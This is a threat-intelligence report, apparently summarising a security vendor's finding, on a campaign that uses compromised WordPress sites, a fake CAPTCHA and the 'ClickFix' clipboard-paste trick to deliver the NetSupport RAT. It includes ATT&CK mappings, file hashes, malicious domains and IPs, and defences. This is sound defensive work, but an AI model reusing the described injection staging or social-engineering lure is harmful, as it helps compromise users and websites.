Full Report
In May 2025, Cybereason Global Security Operations Center (GSOC) detected that threat actors have been hosting malicious WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT).
Analysis Summary
# Tool/Technique: Malicious NetSupport Manager RAT Delivery via Compromised WordPress
## Overview
Threat actors are using compromised WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT). The delivery chain involves phishing, website compromise, JavaScript injection, social engineering via a fake CAPTCHA, and subsequent execution of the RAT payload.
## Technical Details
- Type: Malware (Remote Access Trojan Payload) & Delivery Framework
- Platform: Windows operating systems (Targeted by the main payload script)
- Capabilities: Command & Control (C2), remote execution, reconnaissance, data exfiltration potential.
- First Seen: May 2025 (Detection reported by Cybereason GSOC)
## MITRE ATT&CK Mapping
* **TA0001 - Initial Access**
* T1566 - Phishing
* T1566.001 - Spearphishing Attachment (implied via PDF attachments)
* **TA0002 - Execution**
* T1059 - Command and Scripting Interpreter
* T1059.003 - Windows Command Shell (Used by batch file execution)
* **TA0003 - Persistence**
* *May involve persistence mechanisms via the RAT, but not explicitly detailed in the delivery mechanism.*
* **TA0005 - Defense Evasion**
* T1027 - Obfuscated Files or Information (Malicious JavaScript obfuscation/dynamic loading)
* **TA0011 - Command and Control**
* T1071 - Application Layer Protocol (Implied by RAT C2 communication)
## Functionality
### Core Capabilities
- **Delivery Chain:** Utilizing compromised WordPress sites to serve secondary malicious stages (iFrame injection, JavaScript execution).
- **Browser Targeting:** Specifically targeting users on Windows operating systems.
- **Masquerading:** Using infrastructure (fake CAPTCHA page built with React/Tailwind CSS) to socially engineer users into executing commands.
- **Payload Download/Execution:** Downloading and executing a batch file (`jfgf.bat`) via user-executed command-line operations.
### Advanced Features
- **Anti-Revisit Check:** The initial malicious JavaScript (`j.js`) checks browser's local storage for a "lastvisit" key to avoid repeatedly loading the iframe if the user has encountered the page before, potentially evading detection or analysis.
- **Dynamic Injection:** Using `index.php` to dynamically create script elements pointing to `select.js`.
- **ClickFix Technique:** Copying a command directly to the user's clipboard (`navigator.clipboard.writeText(nE.command)`) and instructing the user to paste it into the Windows Run dialog (Win + R) to execute the download stage.
## Indicators of Compromise
- File Hashes:
- `9c4349534c137e3e43fb2e2caf049f9d` (MD5)
- `4f496bfde39ca83644265d8d1d9bc9da` (MD5)
- `c05f8ec5afbabc36f1c1366549290ae6` (MD5)
- `20ed4df3a9c734c1788bd2ca2658aedb` (MD5)
- `ee75b57b9300aab96530503bfae8a2f2` (MD5)
- `1768c9971cea4cc10c7dd45a5f8f022a` (MD5)
- File Names:
- `j.js` (Initial malicious JavaScript)
- `index.php` (Stage 2 dynamic loader)
- `select.js` (Stage 3 CAPTCHA script)
- `jfgf.bat` (Batch script executed post-user input)
- Registry Keys: N/A
- Network Indicators:
- `islonline[.]org` (Source for `j.js`)
- `AttackerDomain/files/index.php` (Example URL structure for Stage 2)
- `77.83.199[.]34` (IP)
- `jaagnet[.]com` (Domain)
- `107.180.0[.]222` (IP)
- `83.229.17[.]68` (IP)
- Behavioral Indicators:
- Injection of iframe/script tags into the DOM of a legitimate website.
- Use of PowerShell to extract contents of a retrieved ZIP archive.
- Execution of the NetSupport Client process post-infection.
- Threat actor using NetSupport Remote Command Prompt for reconnaissance.
## Associated Threat Actors
- Threat Actors utilizing compromised WordPress infrastructure and the specific ClickFix technique (No specific named threat group mentioned in the summary context).
## Detection Methods
- Signature-based detection: Hashing of identified payload/script files. Blocking known malicious domains/IPs.
- Behavioral detection: Monitoring for dynamic JavaScript execution from meta tags or anchor tags that trigger remote script loads. Detection of the sequence: Phishing link -> DOM manipulation (CAPTCHA) -> User executing clipboard content via Run dialog.
- YARA rules: Could be developed for unique string patterns within `j.js` or the structure of the fake CAPTCHA implementation.
## Mitigation Strategies
- **Prevention:** Blocking access to the identified malicious domains and IPs at the network edge. User education against unsolicited run dialog commands, even if prompted by a website.
- **Hardening:** Implementing strict Content Security Policies (CSP) on all websites, especially WordPress installations, to restrict inline script execution and remote resource loading where possible. Regular patching/hardening of WordPress installations to prevent code injection.
- **Containment:** Immediate isolation of compromised endpoints. Forensic imaging for evidence preservation.
## Related Tools/Techniques
- NetSupport Manager RAT (used as the final payload)
- Phishing Kits/Delivery Frameworks employing fileless or multi-stage delivery via web compromises.
- Techniques similar to "ClickFix" where browser features are manipulated to trick users into running malicious commands via the operating system shell.